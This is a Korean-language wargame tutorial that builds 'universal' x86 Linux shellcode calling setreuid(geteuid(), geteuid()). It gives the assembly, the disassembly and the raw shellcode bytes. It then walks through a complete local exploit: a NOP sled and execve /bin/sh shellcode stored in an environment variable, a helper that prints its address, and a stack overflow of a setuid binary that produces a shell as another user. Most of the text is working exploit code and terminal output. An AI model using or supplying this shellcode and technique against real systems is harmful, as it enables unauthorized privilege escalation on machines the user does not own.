// ========================================
//
// Subject - universal setreuid() shellcode
//
// ========================================

/*
   hkpco
   hkpco@korea.com
   http://hkpco.kr/
*/

일반적으로 대회나 워게임 등을 할 때에는 목표 권한의 uid, gid에 맞는 setreuid() 기계어 코드를 만듭니다.
하지만 매번 새로운 코드를 만드는 것은 매우 번거로운 작업입니다.
여기에 대해 여러 가지 상황에서 굳이 uid를 신경 쓰지 않고도 setreuid() 코드를 적용시킬 수 있는 방법을 소개하고자 합니다.

geteuid() 시스템 콜을 이용하는 방법으로, 해당 시스템 콜은 현재 동작하는 프로그램의 유효 uid(euid)를 리턴해 줍니다.
즉, setreuid( geteuid() , geteuid() );를 수행하는 기계어 코드를 제작하면 geteuid() 시스템 콜이 리턴해 주는 대상 프로그램의 권한이 setreuid()에 바로 적용되기 때문에 상황에 따른 능동적인 코드가 되게 됩니다.

그럼 실제 기계어 코드를 제작해 보겠습니다.

========================================================================
[hkpco@ns hack]$ cat /usr/include/asm/unistd.h | grep geteuid
#define __NR_geteuid 49
[hkpco@ns hack]$ cat /usr/include/asm/unistd.h | grep setreuid
#define __NR_setreuid 70

[hkpco@ns hack]$ cat setreuid_univ.s
.section .text
.globl _start
_start:
    xor %eax, %eax
    movb $49, %al
    int $0x80            ## geteuid() system call

    mov %eax, %ebx
    mov %eax, %ecx
    xor %eax, %eax
    movb $70, %al
    int $0x80            ## setreuid() system call
========================================================================
(위의 시스템 콜 번호는 32비트 x86의 int $0x80 ABI 기준이며, 다른 아키텍처에서는 번호가 다릅니다.)

위 어셈블리 코드는 geteuid() 시스템 콜 호출 시의 리턴값을 setreuid()의 인자로 넘겨주고 호출하는 역할을 합니다.
이제 컴파일한 뒤 기계어 코드를 추출해 보겠습니다.
========================================================================
[hkpco@ns hack]$ as setreuid_univ.s -o setreuid_univ.o
[hkpco@ns hack]$ ld setreuid_univ.o -o setreuid_univ
[hkpco@ns hack]$ objdump -d setreuid_univ

setreuid_univ:     file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
 8048074:       31 c0                   xor    %eax,%eax
 8048076:       b0 31                   mov    $0x31,%al
 8048078:       cd 80                   int    $0x80
 804807a:       89 c3                   mov    %eax,%ebx
 804807c:       89 c1                   mov    %eax,%ecx
 804807e:       31 c0                   xor    %eax,%eax
 8048080:       b0 46                   mov    $0x46,%al
 8048082:       cd 80                   int    $0x80
========================================================================

이렇게 해서 얻은 코드는 아래와 같습니다.

-> \x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80

실제로 정상 작동하는지 테스트해 보겠습니다.

========================================================================
[hkpco@ns univ]$ id
uid=511(hkpco) gid=513(hkpco) groups=513(hkpco)
[hkpco@ns univ]$ ls -al
total 152
drwxrwxr-x    2 hkpco    hkpco        4096 Jan 21 02:20 .
drwxrwxrwt   37 root     root       131072 Jan 21 02:20 ..
-rwsr-sr-x    1 test     test        11541 Jan 21 02:19 vuln
-rw-r--r--    1 test     test           82 Jan 21 02:19 vuln.c
[hkpco@ns univ]$ export HK=`perl -e 'print "\x90"x512,
"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80",    // setreuid( geteuid() , geteuid() );
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`    // shellcode
[hkpco@ns univ]$ cat get_addr.c
int main( void )
{
    char *p = getenv("HK");
    printf( "%p\n" , p );
}
[hkpco@ns univ]$ ./get_addr
0xbffffe89
[hkpco@ns univ]$ ./vuln `perl -e 'print "\x89\xfe\xff\xbf"x100'`
sh-2.05b$ id
uid=524(test) gid=513(hkpco) groups=513(hkpco)
========================================================================

성공적으로 권한을 획득한 것을 볼 수 있습니다.
(여기서 geteuid()가 524(test)를 리턴하는 것은 vuln에 set-uid 비트(-rwsr-sr-x)가 설정되어 있어 유효 uid가 파일 소유자인 test가 되기 때문입니다.)